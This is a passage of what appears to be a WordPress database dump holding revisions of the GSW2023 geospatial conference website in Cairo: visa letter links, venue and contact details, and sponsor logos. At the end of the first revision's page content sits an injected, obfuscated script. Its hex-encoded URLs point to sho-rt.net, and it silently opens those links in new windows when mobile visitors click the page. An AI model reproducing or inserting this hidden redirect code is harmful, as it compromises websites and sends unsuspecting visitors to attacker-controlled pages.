main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-13 22:39:15','2023-06-13 22:39:15','',3066,'https://gsw2023.com/?p=4689',0,'revision','',0),
(4690,1,'2023-06-13 22:40:08','2023-06-13 22:40:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" 